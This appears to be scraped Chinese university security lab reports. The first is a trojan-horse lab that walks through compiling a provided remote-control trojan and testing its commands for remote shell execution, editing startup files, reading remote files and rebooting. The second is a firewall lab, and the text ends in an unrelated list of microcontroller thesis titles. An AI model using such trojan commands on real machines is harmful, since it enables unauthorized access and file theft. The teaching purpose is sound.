XP

操作系统

●

Visual

Studio

6.0

编程环境

实验素材：experiments

目录下的

simplehorse

目录。

虚拟机：virtualmachine

目录下的

WinXPVM

目录。

实验步骤复制实验文件到实验的计算机上。其中，SocketListener

目录下是木马

Server

端源

代码，SocketCommand

目录下是木马

Client

端源代码。程序源代码在虚拟机的

“D:\experiment\simplehorse”目录下。用

Visual

Studio

6.0

环境分别编译这两部

分代码编译。生成的

SocketListener.exe

应用程序时木马被控制端，

SocketCommand.exe

应用程序是启动了木马的控制端。其使用步骤如下。

1、运行木马被控制端

在目标机器上运行

SocketListener.exe，即启动了木马程序。为了演示效果，木马

程序没有实现隐藏.

2、运行控制端程序

在另一台机器上运行

SocketCommand.exe

程序。3、测试

CMD

命令

CMD

命令用于远程执行被控制端的系统命令，其使用格式为：

CMD:xxx

//xxx

为具体的命令。注意中间没有空格，且都是

ASCII

码字符。

例如，CMD:cmd，可以把控制端的

dos

窗口启动起来。

4、测试！SHUT

命令

该命令可以远程关闭

SocketListener.exe

程序。

5、测试

EDITCONF

命令

命令格式为：

EDITCONF:x:yyy

//x

为１表示编辑

autoexe.bat，２表示编辑

config.sys

//yyy

的内容是增加到配置文件中的内容

6、测试

LIST

命令

命令格式为：

LIST:xxx

//xxx

表示需要查看的目录名字

其结果写在控制端的Ｃ:\

result_of_trojan.txt

7、测试

FILEGET

命令

命令功能是获得远端文件内容，并存储到本地文件中。命令格式为：

FILEGET:xxx

//xxx

为远端文件的名称，必须为绝对地址

附加要求：把文件存储在

file

save:

指定的文件中。图

4.

8

为存储在

temp.txt

中。

8、测试

VIEW

命令

功能为查看远端文件的内容，并存储到Ｃ:\

result_of_trojan.txt

文件中。命令格式

为：

VIEW:xxx

//xxx

表示需要查看的文件名字

其结果写在控制端的Ｃ:\

result_of_trojan.txt

9、测试

CD

操作命令

功能是打开或关闭远端机器的ＣＤ机舱门。命令格式为：

CDOPEN

//打开ＣＤ机舱门

CDCLOSE

//关闭ＣＤ机舱门（有些机器不支持命令关闭）10、测试

REBOOT

命令

功能是重启动远端机器。命令格式为：

REBOOT

//使被控制端机器重新启动

七、

实验总结

通过参考实验指导书基本上完成了本次试验的相关要求，达到了试验的相关目的，理解

了木马病毒的相关原理，及其一些木马病毒的防范技术，木马也是种病毒，它的作用是赤

裸裸的偷偷监视别人和数据等，木马的作用比早期的电脑病毒更加有作用，更能够直接达到使用者的目的，它的特点就是具有隐蔽性和非授权性。实验报告组别16姓名林靖皓同组实验者实验项目名称实验十防火墙实验实验日期第17周周二7,8节教师评语实验成绩指导教师张重庆一、实验目的

(1)

通过实验深入理解防火墙的功能和工作原理；

(2)

以“天网”防火墙为例熟悉配置个人防火墙；

(3)

以“天融信”防火墙为例熟悉配置企业级防火墙（选作）。

二、实验仪器

(1)

针对“天网”防火墙

在Windows

2000\2003\XP操作系统下，安装“天网”防火墙的计算机；

(2)

针对“天融信”防火墙（选作）

①一台web服务器；

②将网络划分为外网，内网和DMZ网络，要求：内网可以访问互联网服务器对外网做映射，外网禁止访问内网；

③接口分配为：ETH0接INTERNET，ETH1接内网，ETH2接服务器区。

三、实验原理

3.1防火墙的实现技术

(1)

包过滤技术

包过滤是防火墙的最基本过滤技术，它对内外网之间传输的数据包按照某些特征

事先设置一系列的安全规则进行过滤或筛选。包过滤防火墙检查每一条规则直至发现数据包中的信息与某些规则能符合，则允许或拒绝这个数据包穿过防火墙进行传输。如果没有一条规则能符合，则防火墙使用默认规则，一般情况下，要求丢包。

这些规则根据数据包中的信息进行设置，包括：

●IP源地址；

●IP目标地址；

●协议类型（TCP包、UDP包和ICMP包）；

●TCP或UDP包的目的端口、源端口；

●ICMP消息类型；●TCP选项；

●TCP包的序列号、IP校验和等；

●数据包流向：in或out；

●数据包流经的网络接口；

●数据包协议类型：TCP、UDP、ICMP、IGMP等；

●其他协议选项：ICMP

ECHO、ICMP

ECHO

REPLY等；

●数据包流向：in或out。

因为包过滤只需对每个数据包与相应的安全规则进行比较，实现较为简单，速度快、费用低，并且对用户透明，因而得到了广泛的应用。这种技术实现效率高，但配置复杂，易引起很多问题，对更高层协议信息无理解能力，而且不能彻底防止地址欺骗。包过滤技术防火墙原理如图7-1所示。(2)

地址翻译NAT技术

NAT即网络地址翻译技术，它能够将单位内网使用的内部IP地址翻译成合法的公

网IP，使内网使用内部IP的计算机无须变动，又能够与外网连接。

对于局域网的主机使用、、三个内部IP网段时，当内网主机要与外部网络进行通信，就要在网关处，由NAT将内部IP地址翻译为公网IP地址，从而在外部公网上正常使用。当外部公网响应的数据包返回给NAT后，NAT再将其翻译为内部的IP地址，发给内网的主机，从而实现内网主机与外网的正常通信，解决了IPv4地址不足的问题。同时，由于外网主机只能看到数据包来自NAT翻译后的公网IP，而看不到内网主机的内部IP，所以NAT可保护及隐藏内网计算机。

NAT有三种类型：静态NAT、动态地址NAT、网络地址端口转换NAPT。静态NAT是将内部网络中的每个主机永久的映射成外部网络中的某个合法的地址。而动态地址NAT则是在外部网络中定义了一系列的合法地址，采用动态分配的方法映射到内部网络。NAPT则是把内部地址映射到外部网络的一个IP地址的不同端口上。(3)

应用级网关

应用级网关即代理服务器，代理服务器通常运行在两个网络之间，它为内部网的

客户提供HTTP、FTP等某些特定的因特网服务。代理服务器相对于内部网的客户来说是一台服务器，对于外部网的服务器来说，它又相当于客户机。当代理服务器接收到内部网的客户对某些因特网站点的访问请求后，首先会检查该请求是否符合事先制定的安全规则，如果允许，代理服务器会将此请求发送给因特网站点，从因特网站点反馈回的响应信息再由代理服务器转发给内部网的客户。代理服务器会将内部网的客户和因特网隔离。

对于内外网转发的数据包，代理服务器在应用层对这些数据进行安全过滤，而包过滤技术与NAT技术主要在网络层和传输层进行过滤。由于代理服务器在应用层对不同的应用服务进行过滤，所以可以对常用的高层协议做更细的控制。

由于安全级网关不允许用户直接访问网络，因而使效率降低，而且安全级网关需要对每一个特定的因特网服务安装相应的代理服务软件，内部网的客户要安装此软件的客户端软件，此外，并非所有的因特网应用服务都可以使用代理服务器。应用级网关技术防火墙原理如图7-2所示。(4)

状态检测技术

状态检测防火墙不仅仅像包过滤防火墙仅考查数据包的IP地址等几个孤立的信

息，而是增加了对数据包连接状态变化的额外考虑。它在防火墙的核心部分建立数据的连接状态表，将在内外网间传输的数据包以会话角度进行检测，利用状态表跟踪每一个会话状态。

例如，某个内网主机访问外网的连接请求，防火墙会在连接状态表中加以标注，当此连接请求的外网响应数据包返回时，防火墙会将数据包的各层信息和连接状态表中记录的从内网到外网每天信息相匹配，如果从外网进入内网的这个数据包和连接状态表中的某个记录在各层状态信息一一对应，防火墙则判断此数据包是外网正常返回的响应数据包，会允许这个数据包通过防火墙进入内网。按照这个原则，防火墙将允许从外部响应此请求的数据包以及随后两台主机间传输的数据包通过，直到连接中断，而对由外部发起的企图连接内部主机的数据包全部丢弃，因此状态检测防火墙提供了完整的对传输层的控制能力。

状态检测防火墙对每一个会话的记录、分析工作可能会造成网络连接的迟滞，当存在大量安全规则时尤为明显，采用硬件实现方式可有效改善这方面的缺陷。状态检测防火墙原理如图7-3所示。3.3防火墙的网络部署

防火墙一般部署在内外网的网络边界，对进出内网的数据包进行规则匹配和过滤。硬件防火墙至少有两个网络接口，分别连接内外网。此外，硬件防火墙一般都支持网络接口的扩展，可以支持对其他网络的安全防护。第三个网络接口所连接的网络称为DMZ区域。DMZ可以理解为一个不同于外网或内网的特殊网络区域，一般放置一些不含机密信息的公用服务器，比如Web等。这样来自外网的访问者可以访问DMZ中的服务，但不可能接触到存放在内网中的机密或未公开信息等，即使DMZ中服务器受到攻击或破坏，也不会对内网中的机密信息造成影响。防火墙的网络部署如图7-4所示。当规划一个拥有DMZ的网络时，可以确定以下6条基本访问控制策略：

(1)

内网可以访问外网

(2)

内网可以访问DMZ

(3)

外网不能访问内网

(4)

外网可以访问DMZ

(5)

DMZ不能访问内网

(6)

DMZ不能访问外网

四、实验总结当然，在部署防火墙时也可以根据各机构网络的具体情况而灵活部署，主要目的在于使用防火墙的规则限制和过滤手段，对防火墙各网络接口所连接的网络进行隔离和限制，保证各网络之间数据传输的安全。基于C8051F单片机直流电动机反馈控制系统的设计与研究基于单片机的嵌入式Web服务器的研究MOTOROLA单片机MC68HC（8）05PV8/A内嵌EEPROM的工艺和制程方法及对良率的影响研究基于模糊控制的电阻钎焊单片机温度控制系统的研制基于MCS-51系列单片机的通用控制模块的研究基于单片机实现的供暖系统最佳启停自校正（STR）调节器单片机控制的二级倒立摆系统的研究基于增强型51系列单片机的TCP/IP协议栈的实现基于单片机的蓄电池自动监测系统基于32位嵌入式单片机系统的图像采集与处理技术的研究基于单片机的作物营养诊断专家系统的研究基于单片机的交流伺服电机运动控制系统研究与开发基于单片机的泵管内壁硬度测试仪的研制基于单片机的自动找平控制系统研究基于C8051F040单片机的嵌入式系统开发基于单片机的液压动力系统状态监测仪开发模糊Smith智能控制方法的研究及其单片机实现一种基于单片机的轴快流CO〈,2〉激光器的手持控制面板的研制基于双单片机冲床数控系统的研究基于CYGNAL单片机的在线间歇式浊度仪的研制基于单片机的喷油泵试验台控制器的研制基于单片机的软起动器的研究和设计基于单片机控制的高速快走丝电火花线切割机床短循环走丝方式研究基于单片机的机电产品控制系统开发基于PIC单片机的智能手机充电器基于单片机的实时内核设计及其应用研究基于单片机的远程抄表系统的设计与研究基于单片机的烟气二氧化硫浓度检测仪的研制基于微型光谱仪的单片机系统单片机系统软件构件开发的技术研究基于单片机的液体点滴速度自动检测仪的研制基于单片机系统的多功能温度测量仪的研制基于PIC单片机的电能采集终端的设计和应用基于单片机的光纤光栅解调仪的研制气压式线性摩擦焊机单片机控制系统的研制基于单片机的数字磁通门传感器基于单片机的旋转变压器-数字转换器的研究基于单片机的光纤Bragg光栅解调系统的研究单片机控制的便携式多功能乳腺治疗仪的研制基于C8051F020单片机的多生理信号检测仪基于单片机的电机运动控制系统设计Pico专用单片机核的可测性设计研究基于MCS-51单片机的热量计基于双单片机的智能遥测微型气象站MCS-51单片机构建机器人的实践研究基于单片机的轮轨力检测基于单片机的GPS定位仪的研究与实现基于单片机的电液伺服控制系统用于单片机系统的MMC卡文件系统研制基于单片机的时控和计数系统性能优化的研究基于单片机和CPLD的粗光栅位移测量系统研究单片机控制的后备式方波UPS提升高职学生单片机应用能力的探究基于单片机控制的自动低频减载装置研究基于单片机控制的水下焊接电源的研究基于单片机的多通道数据采集系统基于uPSD3234单片机的氚表面污染测量仪的研制基于单片机的红外测油仪的研究96系列单片机仿真器研究与设计基于单片机的单晶金刚石刀具刃磨设备的数控改造基于单片机的温度智能控制系统的设计与实现基于MSP430单片机的电梯门机控制器的研制基于单片机的气体测漏仪的研究基于三菱M16C/6N系列单片机的CAN/USB协议转换器基于单片机和DSP的变压器油色谱在线监测技术研究基于单片机的膛壁温度报警系统设计基于AVR单片机的低压无功补偿控制器的设计基于单片机船舶电力推进电机监测系统基于单片机网络的振动信号的采集系统基于单片机的大容量数据存储技术的应用研究基于单片机的叠图机研究与教学方法实践HYPERLINK"/det